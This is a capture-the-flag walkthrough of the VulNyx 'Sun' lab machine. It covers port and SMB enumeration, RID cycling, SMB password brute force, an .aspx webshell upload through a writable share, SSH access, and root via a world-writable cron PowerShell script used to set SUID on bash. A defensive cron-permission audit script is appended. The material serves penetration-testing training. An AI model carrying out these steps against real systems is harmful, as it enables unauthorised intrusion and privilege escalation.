Sun is an easy-difficulty Linux machine from the VulNyx platform, created by d4t4s3c, and it runs correctly on VirtualBox.
Skills:
- SMB Enumeration
- SMB Users Enumeration
- Brute Force (SMB)
- ASP.NET
- Cron Task
- PWSH (PowerShell)
Nmap
❯ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.72
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-05 08:26 CEST
Nmap scan report for 192.168.1.72
Host is up (0.000092s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
❯ nmap -n -Pn -sVC -p22,80,139,445,8080 192.168.1.72
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-05 08:27 CEST
Nmap scan report for 192.168.1.72
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Sun
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
8080/tcp open http nginx 1.22.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Sun
|_http-server-header: nginx/1.22.1
MAC Address: 08:00:27:C2:6C:00 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SUN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-04-05T06:27:43
|_ start_date: N/A
|_clock-skew: -2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
22 ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
80 http nginx 1.22.1
139 netbios-ssn Samba smbd 4.6.2
445 netbios-ssn Samba smbd 4.6.2
8080 http nginx 1.22.1
Port: 80 (HTTP)
I fuzz for possible paths/files, without success
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://192.168.1.72/' -x 'html,php,txt'
/index.html (Status: 200) [Size: 263]
Port: 8080 (HTTP)
I fuzz for possible paths/files, without success
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://192.168.1.72:8080/' -x 'html,php,txt'
/index.html (Status: 200) [Size: 263]
Information Disclosure
I request a non-existent path to trigger an error; the error message is not handled, so I can enumerate the technologies in use
ASP.NET
Port: 445 (SMB)
Enum Shares (Guest)
with guest access I did not find anything interesting
❯ smbclient -NL 192.168.1.72
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk File Upload Path
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.1.72 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbmap -H 192.168.1.72
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.1.72:445 Name: 192.168.1.72 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)
nobody NO ACCESS File Upload Path
Enum Users (RIDs Cycling)
❯ rpcclient -W '' -U ''%'' 192.168.1.72 -c 'lookupnames root'
root S-1-22-1-0 (User: 1)
S-1-22-1-0
❯ for i in $(seq 1000 1005); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.72 -c 'lookupsids S-1-22-1-$i'" ;done
S-1-22-1-1000 Unix User\punt4n0 (1)
S-1-22-1-1001 Unix User\1001 (1)
S-1-22-1-1002 Unix User\1002 (1)
S-1-22-1-1003 Unix User\1003 (1)
S-1-22-1-1004 Unix User\1004 (1)
S-1-22-1-1005 Unix User\1005 (1)
punt4n0
Brute Force (Password)
❯ cme smb 192.168.1.72 -u punt4n0 -p /opt/techyou.txt |grep -v '[-]'
SMB 192.168.1.72 445 SUN [*] Windows 6.1 Build 0 (name:SUN) (domain:SUN) (signing:False) (SMBv1:False)
SMB 192.168.1.72 445 SUN [+] SUN\punt4n0:sunday
sunday
Enum Shares (punt4n0)
when accessing the share I see that it points to the path of an HTTP server
❯ smbclient -L //192.168.1.72 -U "punt4n0%sunday"
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
punt4n0 Disk File Upload Path
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.1.72 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbclient //192.168.1.72/punt4n0 -U "punt4n0%sunday"
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 2 10:55:21 2024
.. D 0 Mon Apr 1 18:43:11 2024
index.html N 263 Tue Apr 2 10:54:36 2024
sun.jpg N 98346 Tue Apr 2 10:49:44 2024
19480400 blocks of size 1024. 15670360 blocks available
smb: \>
I upload a test file to see where it is stored
❯ echo 'test' > test.txt
smb: \> put test.txt
putting file test.txt as \test.txt (0.5 kb/s) (average 0.5 kb/s)
the file uploaded via SMB points to the server on port 8080
❯ curl http://192.168.1.72/test.txt
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.22.1</center>
</body>
</html>
❯ curl http://192.168.1.72:8080/test.txt
test
now I try to upload an .aspx webshell, since it is ASP.NET
.aspx webshells usually contain code prepared for Windows, so we adapt it to work on Linux
I upload the .aspx webshell via SMB
smb: \> put cmd.aspx
putting file cmd.aspx as \cmd.aspx (137.7 kb/s) (average 65.5 kb/s)
I manage to execute commands as user punt4n0
in the user's home directory there is an id_rsa private key
I also find the .remember_password file with a password:
Th3_p0w3r_0f_IIS
Port: 22 (SSH)
I access the system as user punt4n0 with the id_rsa key and its passphrase
❯ chmod 600 id_rsa
❯ ssh -i id_rsa punt4n0@192.168.1.72
Enter passphrase for key 'id_rsa':
punt4n0@sun:~$ id;hostname
uid=1000(punt4n0) gid=1000(punt4n0) grupos=1000(punt4n0)
sun
Privilege Escalation
there are no sudo/suid permissions to abuse, so I monitor the cron tasks that may be running on the system
punt4n0@sun:~$ cd /dev/shm
punt4n0@sun:/dev/shm$ cat << 'EOF' > PSmon
#!/bin/bash
# take a snapshot of the current command lines, then diff against it in a loop
old=$(ps -eo command)
filter="kworker|command|defunct"
function ctrl_c(){
exit 1
}
trap ctrl_c int
while true; do
new=$(ps -eo command)
# print only added (>) or removed (<) processes, minus the noise in $filter
diff <(echo "$old") <(echo "$new") | grep "[\>\<]" | grep -vE "$filter"
old=$new
done
EOF
punt4n0@sun:/dev/shm$ chmod +x PSmon
I find a cron task that runs a .ps1 (PowerShell) script; the script runs the id command and saves its output in /dev/shm, in an output file called out
punt4n0@sun:/dev/shm$ ls -la /opt/service.ps1
-rwx---rw- 1 root root 97 abr 2 10:58 /opt/service.ps1
punt4n0@sun:/dev/shm$ cat /opt/service.ps1
$idOutput = id
$outputFilePath = "/dev/shm/out"
$idOutput | Out-File -FilePath $outputFilePath
the owner of service.ps1 is root, and "others" can write to it:
-rwx---rw-
I give /bin/bash suid permissions (4755) and become the root user
punt4n0@sun:~$ ls -l $(which bash)
-rwxr-xr-x 1 root root 1265648 abr 23 2023 /usr/bin/bash
punt4n0@sun:~$ ls -l $(which bash)
-rwsr-xr-x 1 root root 1265648 abr 23 2023 /usr/bin/bash
punt4n0@sun:~$ /usr/bin/bash -p
bash-5.2# id
uid=1000(punt4n0) gid=1000(punt4n0) euid=0(root) grupos=1000(punt4n0)
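As an added defender-side example (not part of the original writeup), the following bash script audits a system-crontab file for scripts that group or others can modify, the exact condition that made /opt/service.ps1 abusable. The crontab line and the sample files it creates under a temp directory are constructed, so it runs offline.

```shell
#!/usr/bin/env bash
# Added example, not code from the writeup: find cron-driven scripts whose
# permissions let group or others write to them (like -rwx---rw- on a
# root-owned .ps1 run from a root cron job).

# Return 0 when FILE's group or other bits include write, 1 otherwise.
is_loosely_writable() {
    local mode
    mode=$(stat -c '%a' "$1" 2>/dev/null) || mode=$(stat -f '%Lp' "$1") || return 1
    # last two octal digits are the group and other permission triplets
    local g=$(( 8#${mode: -2:1} )) o=$(( 8#${mode: -1} ))
    [ $(( (g | o) & 2 )) -ne 0 ]
}

# Read a system-crontab-style file (min hour dom mon dow user command...),
# pull every absolute path out of each command and print the ones that
# exist and are writable by group or others, one per line.
audit_cron_file() {
    local file="$1" line word
    while IFS= read -r line; do
        case "$line" in ''|\#*) continue ;; esac
        set -- $line; shift 6 2>/dev/null || continue   # drop time + user fields
        for word in "$@"; do
            [[ $word == /* && -f $word ]] || continue
            if is_loosely_writable "$word"; then printf '%s\n' "$word"; fi
        done
    done < "$file"
}

# Constructed sample mirroring the machine: a root job running a .ps1 via pwsh
# next to a correctly protected script.  Prints only the base names found.
demo() {
    local d; d=$(mktemp -d)
    printf 'id > %s/out\n' "$d" > "$d/service.ps1"; chmod 706 "$d/service.ps1"  # -rwx---rw-
    printf 'echo ok\n' > "$d/backup.sh";            chmod 700 "$d/backup.sh"    # -rwx------
    cat > "$d/crontab" <<EOF
# constructed crontab
* * * * * root /usr/bin/pwsh $d/service.ps1
0 3 * * * root /bin/bash $d/backup.sh
EOF
    audit_cron_file "$d/crontab" | while IFS= read -r p; do printf '%s\n' "${p##*/}"; done
    rm -rf "$d"
}

demo
```

Run it as root against /etc/crontab and the files under /etc/cron.d to get the real list; any path it prints should be made root-writable only (chmod o-w,g-w) before the job is allowed to keep running.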
now as root I can read the user.txt and root.txt flags
bash-5.2# find / -name user.txt -o -name root.txt |xargs cat
e1e7f5e0************************
3b16b996************************
that's it for the Sun machine.
Happy Hacking!